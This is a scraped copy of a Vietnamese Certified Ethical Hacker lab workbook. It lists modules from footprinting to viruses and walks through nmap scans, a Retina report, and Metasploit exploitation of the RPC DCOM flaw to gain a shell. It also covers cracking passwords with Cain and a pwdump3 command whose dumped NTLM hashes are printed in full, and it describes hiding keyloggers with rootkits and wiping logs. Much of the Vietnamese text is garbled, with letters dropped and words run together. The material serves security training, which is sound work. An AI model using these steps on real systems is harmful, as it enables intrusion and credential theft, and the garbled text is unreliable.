Upload
tuan-xi-trum
View
229
Download
0
Embed Size (px)
Citation preview
7/28/2019 VanLuong.blogspot.com CEH
1/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 1
Mc Lc
Bi 1:..................................................................................................................................... 3FOOTPRINTING ................................................................................................................ 3
I/ Gii thiu v Foot Print:............................................................................................... 3II/ Cc bi thc hnh: ...................................................................................................... 3Bi 1: Tm thng tin v Domain................................................................................... 3
Bi 2: Tm thng tin email ...........................................................................................5Bi 2:..................................................................................................................................... 7SCANNING..........................................................................................................................7
I/ Gii thiu v Scanning: ............................................................................................... 7II/ Cc Bi thc hnh.......................................................................................................7
Bi thc hnh 1: S dng Phn mm Nmap.................................................................. 7Bi thc hnh th2: S dng phn mm Retina pht hin cc vulnerabilities v tncng bng Metaesploit framework................................................................................ 13
Bi 3:................................................................................................................................... 18SYSTEM HACKING......................................................................................................... 18
I/ Gii thiu System Hacking:....................................................................................... 18II/ Thc hnh cc bi Lab ............................................................................................. 18
Bi 1: Crack password nt b ni b........................................................................ 18Bi 2: Sdng chng trnh pwdump3v2 khi c c 1 user administrator camy nn nhn c th tm c thng tin cc user cn li. ................................... 20Bi Lab 3: Nng quyn thng qua chng trnh Kaspersky Lab ............................ 23Bi Lab 4: Sdng Keylogger................................................................................... 25Bi Lab 5: Sdng Rootkit v xa Log file .............................................................. 27
Bi 4:................................................................................................................................... 30TROJAN v BACKDOOR................................................................................................ 30
I/ Gii thiu v Trojan v Backdoor: ........................................................................... 30II/ Cc bi thc hnh: .................................................................................................... 30
Bi 1 Sdng netcat: ................................................................................................. 30Bi 2: Sdng Trojan Beast v detect trojan. .......................................................... 32Mun s dng Trojan Beast, ta cn phi xy dng 1 file Server ci ln my nn nhn, sau file server ny s lng nghe nhng port cnh v t my tn cng ta s connectvo my nn nhn thng qua cng ny. ........................................................................ 32Bi 3: Sdng Trojan di dng Webbase .............................................................. 35
Bi 5:................................................................................................................................... 38CC PHNG PHP SNIFFER..................................................................................... 38
I/ Gii thiu v Sniffer .................................................................................................. 38Bi 6:................................................................................................................................... 65Tn Cng tchi dch v DoS........................................................................................... 65
I/ Gii thiu: .................................................................................................................. 65
II/ M t bi lab: ............................................................................................................ 67Bi Lab 1: DoS bng cch sdng Ping of death. ................................................... 67Bi lab 2: DoS 1 giao thc khng sdng chng thc(trong bi sdng giao thcRIP)............................................................................................................................. 69Bi Lab 3: Sdng flash DDoS ............................................................................ 72
Bi 7:................................................................................................................................... 74Social Engineering ............................................................................................................. 74
I/ Gii Thiu .................................................................................................................. 74
7/28/2019 VanLuong.blogspot.com CEH
2/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 2
II/ Cc bi Lab: .............................................................................................................. 74Bi Lab 1: Gi email nc nh km Trojan .............................................................. 74
Bi 8:................................................................................................................................... 77Session Hijacking ............................................................................................................... 77
I/ Gii thiu: ................................................................................................................... 77II/ Thc hin bi Lab........................................................................................................ 77
Bi 9:................................................................................................................................... 80Hacking Web Server .......................................................................................................... 80I/ Gii thiu: ................................................................................................................... 80II/ Thc Hin bi lab. ....................................................................................................... 80
Bi Lab 1: Tn cng Web Server Win 2003(li Apache) .......................................... 80Bi lab 2: Khai thc li ng dng Server U ............................................................. 84
Bi 10:................................................................................................................................. 85WEB APPLICATION HACKING.................................................................................... 85
I/ Gii thiu: .................................................................................................................. 85II/ Cc Bi Lab ............................................................................................................... 85
Bi Lab 1: Cross Site Scripting.................................................................................. 85Bi Lab 2: Insufficient Data Validation .................................................................... 86Bi Lab 3: Cookie Manipulation ............................................................................... 88Bi Lab 4: Authorization Failure .............................................................................. 89
Bi 11:................................................................................................................................. 91SQL INJECTION .............................................................................................................. 91
I/ Gii thiu v SQL Injection: ...................................................................................... 91II/ Thc Hnh Bi Lab .................................................................................................. 94
Bi 12:............................................................................................................................... 101WIRELESS HACKING .................................................................................................. 101
I/ Gii Thiu ................................................................................................................. 101II/ Thc hnh bi Lab: ................................................................................................ 101
Bi 13:............................................................................................................................... 105VIRUS .............................................................................................................................. 105
I/ Gii thiu: (tham kho bi c thm) ..................................................................... 105II/ Thc hnh Lab: ...................................................................................................... 105
Bi 1: Virus ph hy dliu my ............................................................................ 105Bi 2: Virus gaixinh ly qua tin nhn...................................................................... 107
Bi 14:............................................................................................................................... 111BUFFER OVERFLOW ................................................................................................... 111
I/ L thuyt .................................................................................................................. 111II/ Thc hnh: .............................................................................................................. 118
7/28/2019 VanLuong.blogspot.com CEH
3/120
7/28/2019 VanLuong.blogspot.com CEH
4/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 4
Registrar Name....: BlueHost.Com
Registrar Whois...: whois.bluehost.com
Registrar Homepage: http://www.bluehost.com/
Domain Name: ITVIETNAM.COM
Created on..............: 1999-11-23 11:31:30 GMT
Expires on..............: 2009-11-23 00:00:00 GMT
Last modified on........: 2007-07-30 03:15:11 GMT
Registrant Info: (FAST-12836461)
VSIC Education Corporation
VSIC Education Corporation
78-80 Nguyen Trai Street,
5 District, HCM City, 70000
Vietnam
Phone: +84.88363691
Fax..:
Email: [email protected]
Last modified: 2007-03-23 04:12:24 GMT
Administrative Info: (FAST-12836461)
VSIC Education Corporation
VSIC Education Corporation
78-80 Nguyen Trai Street,
5 District, HCM City, 70000
Vietnam
Phone: +84.88363691
Fax..:
Email: [email protected] modified: 2007-03-23 04:12:24 GMT
Technical Info: (FAST-12785240)
Attn: itvietnam.com
C/O BlueHost.Com Domain Privacy
1215 North Research WaySuite #Q 3500
Orem, Utah 84097
United States
Phone: +1.8017659400
Fax..: +1.8017651992
Email: [email protected]
7/28/2019 VanLuong.blogspot.com CEH
5/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 5
Last modified: 2007-04-05 16:50:56 GMT
Status: Locked
Ngoi vic tm thng tin v domain nh trn, chng ta c th s dng cc tin ch
Reverse IP domain lookup c th xem th trn IP ca mnh c bao nhiu host chung vimnh. Vo link sau y s dng tin ch ny.http://www.domaintools.com/reverse-ip/
Vic tm kim c thng tin ny rt cn thit vi Hacker, bi v da vo thng tin sdng chung Server ny, Hacker c th thng qua cc Website b li trong danh sch trn vtn cng vo Server t kim sot tt c cc Website c hosting trn Server.
Bi 2: Tm thng tin emailTrong bi thc hnh ny, chng ta s dng phn mm 1st email address spider
tm kim thng tin v cc email. Hacker c th s dng phn mm ny thu thp thm thngtin v mail, hay lc ra cc i tng email khc nhau, tuy nhin bn c th s dng tool ny thu thp thm thng tin nhm mc ch marketing, v d bn cn tm thng tin ca ccemail c ui l @vnn.vn hay @hcm.vnn.vn phc cho vic marketing sn phm.
Ta c th cu hnh vic s dng trang web no ly thng tin, trong bi ti s dngtrang google.com tm kim.
7/28/2019 VanLuong.blogspot.com CEH
6/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 6
Sau nh t kha vnn.vn vo tag keyword
Sau chng ta c c 1 list mail nhs dng trng trnh ny.
7/28/2019 VanLuong.blogspot.com CEH
7/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 7
Bi 2:
SCANNING
I/ Gii thiu v Scanning:
Scanning hay cn gi l qut mng l bc khng th thiu c trong qu trnh tncng vo h thng mng ca hacker. Nu lm bc ny tt Hacker s mau chng pht hinc li ca h thng v d nh li RPC ca Window hay li trn phm mm dch v webnh Apache v.v. V t nhng li ny, hacker c th s dng nhng on m c hi(t cctrang web) tn cng vo h thng, ti t nht ly shell.
Phn mm scanning c rt nhiu loi, gm cc phm mm thng mi nh Retina,GFI, v cc phn mm min ph nh Nmap,Nessus. Thng thng cc n bn thng mi cth update cc bug li mi t internet v c th d tm c nhng li mi hn. Cc phnmm scanning c th gip ngi qun tr tm c li ca h thng, ng thi a ra cc gii
php sa li nh update Service patch hay s dng cc policy hp l hn.
II/ Cc Bi thc hnh
Bi thc hnh 1: S dng Phn mm Nmap
Trc khi thc hnh bi ny, hc vin nn tham kho li gio trnh l thuyt v ccoption ca nmap.
Chng ta c th s dng phn mm trong CD CEH v5, hay c th download bn minht t website: www.insecure.org. Phn mm nmap c 2 phin bn dnh cho Win v dnhcho Linux, trong bi thc hnh v Nmap, chng ta s dng bn dnh cho Window.
thc hnh bi ny, hc vin nn s dng Vmware v boot t nhiu hiu hnhkhc nhau nh Win XP sp2, Win 2003 sp1, Linux Fedora Core, Win 2000 sp4,v.v.
Trc tin s dng Nmap do thm th xem trong subnet c host no up v cc portcc host ny m, ta s dng lnh Nmap h xem li cc option ca Nmap, sau thc hinlnh Nmap sS 10.100.100.1-20. V sau c kt qu sau:
C:\Documents and Settings\anhhao>nmap -sS 10.100.100.1-20
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:27 Pacific Standard
Time
Interesting ports on 10.100.100.1:Not shown: 1695 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:09:ED:10 (VMware)
Interesting ports on 10.100.100.6:Not shown: 1678 closed ports
PORT STATE SERVICE
7/28/2019 VanLuong.blogspot.com CEH
8/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 8
7/tcp open echo
9/tcp open discard
13/tcp open daytime
17/tcp open qotd
19/tcp open chargen
23/tcp open telnet42/tcp open nameserver
53/tcp open domain
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
2105/tcp open eklogin
3389/tcp open ms-term-serv
8080/tcp open http-proxy
MAC Address: 00:0C:29:59:97:A2 (VMware)
Interesting ports on 10.100.100.7:Not shown: 1693 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:95:A9:03 (VMware)
Interesting ports on 10.100.100.11:Not shown: 1695 filtered ports
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-dsMAC Address: 00:0C:29:A6:2E:31 (VMware)
Skipping SYN Stealth Scan against 10.100.100.13 because Windows does not support
scanning your own machine (localhost) this way.
All 0 scanned ports on 10.100.100.13 are
7/28/2019 VanLuong.blogspot.com CEH
9/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 9
Interesting ports on 10.100.100.16:
Not shown: 1689 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
MAC Address: 00:0C:29:D6:73:6D (VMware)
Interesting ports on 10.100.100.20:
Not shown: 1693 closed ports
PORT STATE SERVICE
135/tcp open msrpc
445/tcp open microsoft-ds
1000/tcp open cadlock
5101/tcp open admdog
MAC Address: 00:15:C5:65:E3:85 (Dell)
Nmap finished: 20 IP addresses (7 hosts up) scanned in 21.515 seconds
Trong mng c tt c 7 host, 6 my Vmware v 1 PC DELL. By gibc tip theo tatm kim thng tin v OS ca cc Host trn bng s dng lnh Nmap v -O ip address .
C:\Documents and Settings\anhhao>nmap -vv -O 10.100.100.7 (xem chi tit Nmap qut)
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:46 Pacific Standard
Time
Initiating ARP Ping Scan at 10:46
Scanning 10.100.100.7 [1 port]
Completed ARP Ping Scan at 10:46, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:46Completed Parallel DNS resolution of 1 host. at 10:46, 0.01s elapsed
Initiating SYN Stealth Scan at 10:46
Scanning 10.100.100.7 [1697 ports]
Discovered open port 1025/tcp on 10.100.100.7
Discovered open port 445/tcp on 10.100.100.7
Discovered open port 135/tcp on 10.100.100.7
Discovered open port 139/tcp on 10.100.100.7
7/28/2019 VanLuong.blogspot.com CEH
10/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 10
Completed SYN Stealth Scan at 10:46, 1.56s elapsed (1697 total ports)
Initiating OS detection (try #1) against 10.100.100.7
Host 10.100.100.7 appears to be up ... good.
Interesting ports on 10.100.100.7:
Not shown: 1693 closed ports
PORT STATE SERVICE135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:95:A9:03 (VMware)
Device type: general purpose
Running: Microsoft Windows 2003
OS details: Microsoft Windows 2003 Server SP1
OS Fingerprint:OS:SCAN(V=4.20%D=8/2%OT=135%CT=1%CU=36092%PV=Y%DS=1%G=Y%M=000C
29%TM=46B2187
OS:3%P=i686-pc-windows-
windows)SEQ(SP=FF%GCD=1%ISR=10A%TI=I%II=I%SS=S%TS=0)
OS:OPS(O1=M5B4NW0NNT00NNS%O2=M5B4NW0NNT00NNS%O3=M5B4NW0NNT0
0%O4=M5B4NW0NNT0
OS:0NNS%O5=M5B4NW0NNT00NNS%O6=M5B4NNT00NNS)WIN(W1=FAF0%W2=F
AF0%W3=FAF0%W4=F
OS:AF0%W5=FAF0%W6=FAF0)ECN(R=Y%DF=N%T=80%W=FAF0%O=M5B4NW0NN
S%CC=N%Q=)T1(R=Y
OS:%DF=N%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD
OS:=0%Q=)T3(R=Y%DF=N%T=80%W=FAF0%S=O%A=S+%F=AS%O=M5B4NW0NNT
00NNS%RD=0%Q=)T4
OS:(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T
=80%W=0%S=Z%A=S+%
OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=80%W=0%S=A%A=O%F=R%O=%RD=
0%Q=)T7(R=Y%DF=N%
OS:T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%TOS=0
%IPL=B0%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUL=G%RUD=G)IE(R=Y%DFI=S%T=80%T
OSI=Z%CD=Z%SI=S%OS:DLI=S)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IPID Sequence Generation: Incremental
7/28/2019 VanLuong.blogspot.com CEH
11/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 11
OS detection performed. Please report any incorrect results at http://insecure.o
rg/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 3.204 seconds
Raw packets sent: 1767 (78.460KB) | Rcvd: 1714 (79.328KB)
Ta c th xem cc figerprinting ti C:\Program Files\Nmap\nmap-os-fingerprints
Tip tc vi nhng my cn li.
C:\Documents and Settings\anhhao>nmap -O 10.100.100.1
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:54 Pacific Standard
Time
Interesting ports on 10.100.100.1:
Not shown: 1695 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
MAC Address: 00:0C:29:09:ED:10 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.12 (x86)Uptime: 0.056 days (since Thu Aug 02 09:34:08 2007)
Network Distance: 1 hop
7/28/2019 VanLuong.blogspot.com CEH
12/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 12
OS detection performed. Please report any incorrect results at http://insecure.o
rg/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 2.781 seconds
Tuy nhin c 1 s host Nmap khng th nhn din ra nh sau:
C:\Documents and Settings\anhhao>nmap -O 10.100.100.16
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 10:55 Pacific Standard
Time
Interesting ports on 10.100.100.16:
Not shown: 1689 closed ports
PORT STATE SERVICE
21/tcp open ftp
25/tcp open smtp
80/tcp open http135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1433/tcp open ms-sql-sMAC Address: 00:0C:29:D6:73:6D (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://i
nsecure.org/nmap/submit/ ).TCP/IP fingerprint:
OS:SCAN(V=4.20%D=8/2%OT=21%CT=1%CU=35147%PV=Y%DS=1%G=Y%M=000C2
9%TM=46B21A94
OS:%P=i686-pc-windows-
windows)SEQ(SP=FD%GCD=2%ISR=10C%TI=I%II=I%SS=S%TS=0)S
OS:EQ(SP=FD%GCD=1%ISR=10C%TI=I%II=I%SS=S%TS=0)OPS(O1=M5B4NW0NNT0
0NNS%O2=M5B
OS:4NW0NNT00NNS%O3=M5B4NW0NNT00%O4=M5B4NW0NNT00NNS%O5=M5B4
NW0NNT00NNS%O6=M5
OS:B4NNT00NNS)WIN(W1=FAF0%W2=FAF0%W3=FAF0%W4=FAF0%W5=FAF0%W6
=FAF0)ECN(R=Y%DOS:F=Y%T=80%W=FAF0%O=M5B4NW0NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=
O%A=S+%F=AS%RD=0
OS:%Q=)T2(R=Y%DF=N%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%
DF=Y%T=80%W=FAF0
OS:%S=O%A=S+%F=AS%O=M5B4NW0NNT00NNS%RD=0%Q=)T4(R=Y%DF=N%T=8
0%W=0%S=A%A=O%F=
7/28/2019 VanLuong.blogspot.com CEH
13/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 13
OS:R%O=%RD=0%Q=)T5(R=Y%DF=N%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0
%Q=)T6(R=Y%DF=N%T
OS:=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=N%T=80%W=0%S=Z
%A=S+%F=AR%O=%RD=
OS:0%Q=)U1(R=Y%DF=N%T=80%TOS=0%IPL=38%UN=0%RIPL=G%RID=G%RIPCK
=G%RUCK=G%RUL=
OS:G%RUD=G)IE(R=Y%DFI=S%T=80%TOSI=S%CD=Z%SI=S%DLI=S)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://insecure.o
rg/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 12.485 seconds
Tuy nhin ta c th nhn din rng y l 1 Server chy dch v SQL v Web Server,by gita s dng lnh Nmap v p 80 sV 10.100.100.16 xc nh version ca IIS.
C:\Documents and Settings\anhhao>nmap -p 80 -sV 10.100.100.16
Starting Nmap 4.20 (http://insecure.org ) at 2007-08-02 11:01 Pacific Standard
Time
Interesting ports on 10.100.100.16:
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS webserver 5.0MAC Address: 00:0C:29:D6:73:6D (VMware)
Service Info: OS: Windows
Service detection performed. Please report any incorrect results at http://insec
ure.org/nmap/submit/ .
Nmap finished: 1 IP address (1 host up) scanned in 6.750 seconds
Vy ta c thon c phn nhiu host l Window 2000 Server. Ngoi vic thchnh trn chng ta c th s dng Nmap trace, lu log v.v
Bi thc hnh th2: S dng phn mm Retina pht hin cc vulnerabilities v tn cngbng Metaesploit framework.
Retina ca Ieye l phn mm thng mi(cng nh GFI, shadow v.v ) c th updatecc l hng 1 cch thng xuyn v gip cho ngi Admin h thng c tha ra nhng gii
php x l.By gi ta s dng phn mm Retina d tm li ca my Win 2003
Sp0(10.100.100.6)
7/28/2019 VanLuong.blogspot.com CEH
14/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 14
Report t chng trnh Retina:
TOP 20 VULNERABILITIES
The following is an overview of the top 20 vulnerabilities on your network.
Rank Vulnerability Name Count
1. echo service 1
2. ASN.1 Vulnerability Could Allow Code Execution 1
3. Windows Cumulative Patch 835732 Remote 1
4. Null Session 1
5. No Remote Registry Access Available 1
6. telnet service 1
7. DCOM Enabled 1
8. Windows RPC Cumulative Patch 828741 Remote 1
9. Windows RPC DCOM interface buffer overflow 1
10. Windows RPC DCOM multiple vulnerabilities 1
11. Apache 1.3.27 0x1A Character Logging DoS 1
7/28/2019 VanLuong.blogspot.com CEH
15/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 15
TOP 20 OPEN PORTS
The following is an overview of the top 20 open ports on your network.
TOP 20 OPERATING SYSTEMS
The following is an overview of the top 20 operating systems on your network.
12. Apache 1.3.27 HTDigest Command Execution 1
13. Apache mod_alias and mod_rewrite Buffer Overflow 1
14. ApacheBench multiple buffer overflows 1
15. HTTP TRACE method supported 1
Rank Port Number Description Count
1. TCP:7 ECHO - Echo 1
2. TCP:9 DISCARD - Discard 1
3. TCP:13 DAYTIME - Daytime 1
4. TCP:17 QOTD - Quote of the Day 1
5. TCP:19 CHARGEN - Character Generator 1
6. TCP:23 TELNET - Telnet 1
7. TCP:42 NAMESERVER / WINS - Host Name Server 1
8. TCP:53 DOMAIN - Domain Name Server 1
9. TCP:80WWW-HTTP - World Wide Web HTTP (Hyper Text
Transfer Protocol)1
10. TCP:135RPC-LOCATOR - RPC (Remote Procedure Call) Location
Service
1
11. TCP:139 NETBIOS-SSN - NETBIOS Session Service 1
12. TCP:445 MICROSOFT-DS - Microsoft-DS 1
13. TCP:1025 LISTEN - listen 1
14. TCP:1026 NTERM - nterm 1
15. TCP:1030 IAD1 - BBN IAD 1
16. TCP:2103 ZEPHYR-CLT - Zephyr Serv-HM Conncetion 1
17. TCP:2105 EKLOGIN - Kerberos (v4) Encrypted RLogin 1
18. TCP:3389 MS RDP (Remote Desktop Protocol) / Terminal Services 119. TCP:8080 Generic - Shared service port 1
20. UDP:7 ECHO - Echo 1
7/28/2019 VanLuong.blogspot.com CEH
16/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 16
Nh vy ta xc nh hiu hnh ca my 10.100.100.6, cc Port mca h thngv cc li ca h thng. y l thng tin cn thit ngi Admin nhn din li v v liTrong Top 20 vulnerabilities ta s khai thc bug li th 10 l RPC DCOM bng chng trinhMetaesploit framework(CD CEH v5). Ta c th kim tra cc thng tin li ny trn chnh trangca Ieye hay securityfocus.com, microsoft.com.
Ta s dng giao din console ca Metaesploit tm bug li hp vi chng trnhRetina va qut c.
Rank Operating System Name Count
1. Windows Server 2003 1
7/28/2019 VanLuong.blogspot.com CEH
17/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 17
Ta thy c th nhn thy bug li msrpc_dcom_ms03_026.pm c lit k trong phnexploit ca metaesploit. By gita bt u khai thc li ny.
Nh vy sau khi khai thc ta c c shell ca my Win 2003, by gi ta c th
upload backdoor hay ly nhng thng tin cn thit trong my ny(vn ny sc bn nhng chng sau).
Kt lun: Phn mm scanning rt quan trng vi Hacker c th pht hin li ca h thng,sau khi xc nh li Hacker c th s dng Framework c sn hay code c sn trn Internet c th chim quyn s dng ca my mc tiu. Tuy nhin y cng l cng c hu ch caAdmin h thng, phn mm ny gip cho ngi Admin h thng nh gi li mc bo mtca h thng mnh v kim tra lin tc cc bug li xy ra.
7/28/2019 VanLuong.blogspot.com CEH
18/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 18
Bi 3:
SYSTEM HACKING
I/ Gii thiu System Hacking:Nh chng ta hc phn l thuyt, Module System Hacking bao gm nhng k
thut ly Username v Password, nng quyn trong h thng, s dng keyloger ly thngtin ca i phng(trong bc ny cng c th Hacker li Trojan, vn hc chngtip theo), n thng tin ca process ang hot ng(Rootkit), v xa nhng log h thng.
i vi phn ly thng tin v username v password Local, hacker c th crack pass
trn my ni b nu s dng phn mm ci ln my , hay s dng CD boot Knoppix lysyskey, bc tip theo l gii m SAM ly hash ca Account h thng. Chng ta c th lyusername v password thng qua remote nh SMB, NTLM(bng k thut sniffer s hc chng sau) hay thng qua 1 Account ca h thng bit(s dng PWdump3)
Vi phn nng quyn trong h thng, Hacker c th s dng l hng ca Window, ccphn mm chy trn h thng nhm ly quyn Admin iu khin h thng. Trong bi thchnh ta khai thc l hng ca Kaberky Lab 6.0 nng quyn t user bnh thng sang userAdministrator trong Win XP sp2.
Phn Keylogger ta s dng SC-keyloger xem cc hot ng ca nn nhn nh gimst ni dung bn phm, thng tin v chat, thng tin v s dng my, thng tin v cc ti khonuser s dng.
Tip theo ta s dng Rootkit n cc process ca keyloger, lm cho ngi admin hthng khng th pht hin ra l mnh ang b theo di. bc ny ta s dng vanquis rootkitn cc process trong h thng. Cui cng ta xa log v du vt xm nhp h thng.
II/ Thc hnh cc bi Lab
Bi 1: Crack password nt b ni b
7/28/2019 VanLuong.blogspot.com CEH
19/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 19
Trc tin ta ci phm mm Cain vo my i phng, v s dng phn mm ny d tm password ca user.
Qu trnh Add user
Bt phm mm Cain v chn Import Hashes from local system
y chng ta thy c 3 ch, Import hash from local system, ta s dng fileSAM ca h thng hin ti ly hash ca account(khng c m ha syskey), Option ImportHashes from text file, thng thng text file ny l ly t Pwdump(lu hash ca account hthng di dng khng b m ha), Option th 3 l khi chng ta c syskey v file SAM b mha bi syskey. Ca ba trng hp nu nhp y thng tin chng ta u c th c hash caaccount khng b m ha bi syskey. Da vo thng tin hash ny phn mm s brute force tm kim password ca account.
Trong bi ta chn user haovsic, v chn Brute force theo NTLM hash. Sau khi chnch ny ta thy PC bt u tnh ton v cho ra kt qu.
7/28/2019 VanLuong.blogspot.com CEH
20/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 20
Bi 2: Sdng chng trnh pwdump3v2 khi c c 1 user administrator camy nn nhn c th tm c thng tin cc user cn li.
7/28/2019 VanLuong.blogspot.com CEH
21/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 21
My ca nn nhn s dng Window 2003 sp0, v c sn user quyen password lcisco, by gida vo account ny, ta c th tm thm thng tin ca nhng account khctrong my.
Trc tin ta s dng pwdump3.exe xem cc tham s cn nhp vo. Sau sdng lnh pwdump3.exe 10.100.100.6 c;\hao2003sp0 quyen, v nhp vo password causer quyen.
Ta mfile hao2003sp0 xem trong thng tin.aaa:1015:NO PASSWORD*********************:NO
PASSWORD*********************:::
anhhao:1010:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782
BBD9D5E18:::
anhhao1:1011:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782
BBD9D5E18:::
anhhao2:1013:DCAF9F8B002C73A0AAD3B435B51404EE:A923FFCC9BE38EBF40A5782
BBD9D5E18:::
anhhaoceh:1019:B26C623F5254C6A311F64391B17C6CDE:98A2C048C77703D54BD0E88
887EFD68E:::
ASPNET:1006:7CACBCC121AC203CD8652FE65BEA4486:7D34A6E7504DFAF453D421
3660AE7D35:::
Guest:501:NO PASSWORD*********************:NO
PASSWORD*********************:::hack:1022:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB12
283678:::
hacker:1018:BCE739534EA4E445AAD3B435B51404EE:5E7599F673DF11D5C5C4D950F
5BF0157:::
hao123:1020:58F907D1C79C344DAAD3B435B51404EE:FD03071D41308B58B9DDBC6D
5576D78D:::
7/28/2019 VanLuong.blogspot.com CEH
22/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 22
haoceh:1016:B3FF8763A6B5CE26AAD3B435B51404EE:7AD94985F28454259BF2A03821
FEC8DB:::
hicehclass:1023:B2BEF1B1582C2DC0AAD3B435B51404EE:D6198C25F8420A93301A579
2398CF94C:::
IUSR_113-
SSR3JKXGW3N:1003:449913C1CEC65E2A97074C07DBD2969F:9E6A4AF346F1A1F483
3ABFA52ADA9462:::
IWAM_113-
SSR3JKXGW3N:1004:4431005ABF401D86F92DBAC26FDFD3B8:188AA6E0737F12D16
D60F8B64F7AE1FA:::
lylam:1012:EE94DC327C009996AAD3B435B51404EE:7A63FB0793A85C960A775497C9
D738EE:::
quyen:500:A00B9194BEDB81FEAAD3B435B51404EE:5C800F13A3CE86ED2540DD4E7331E9A2:::SUPPORT_388945a0:1001:NO
PASSWORD*********************:F791B19C488F4260723561D4F484EA09:::
tam:1014:NO PASSWORD*********************:NOPASSWORD*********************:::
test:1017:01FC5A6BE7BC6929AAD3B435B51404EE:0CB6948805F797BF2A82807973B8
9537:::
vic123:1021:CCF9155E3E7DB453AAD3B435B51404EE:3DBDE697D71690A769204BEB
12283678:::
Ta thy thng tin user quyen c ID l 500, y l ID ca user administrator trongmng, v user Guest l 501. Ngoi thng tin trn, ta c thm thng tin v pash hash ca user,
by gita s dng chng trnh Cain tm kim thng tin v password ca cc user khc.
S dng Brute Force Attack vi user hiclassceh v tm ra password l 1234a.Password ny ch c 5 k t v d dng b Brute Force, tuy nhin i vi nhng password l
7/28/2019 VanLuong.blogspot.com CEH
23/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 23
stong password (password bao gm ch hoa v thng, k t, s, k tc bit) th s luhn.
Bi Lab 3: Nng quyn thng qua chng trnh Kaspersky Lab
i vi vic nng quyn trong mt h thng hacker phi li dng l hng no ,hoc l t hiu hnh, hoc l t nhng phn mm ca hng th 3, trong trng hp ny,chng ta nng quyn thng qua phn mm dit Virus l Kaspersky Lab. chun b bi labny, chng ta ln trang web www.milw0rm.com tm thng tin von m khai thc ny.
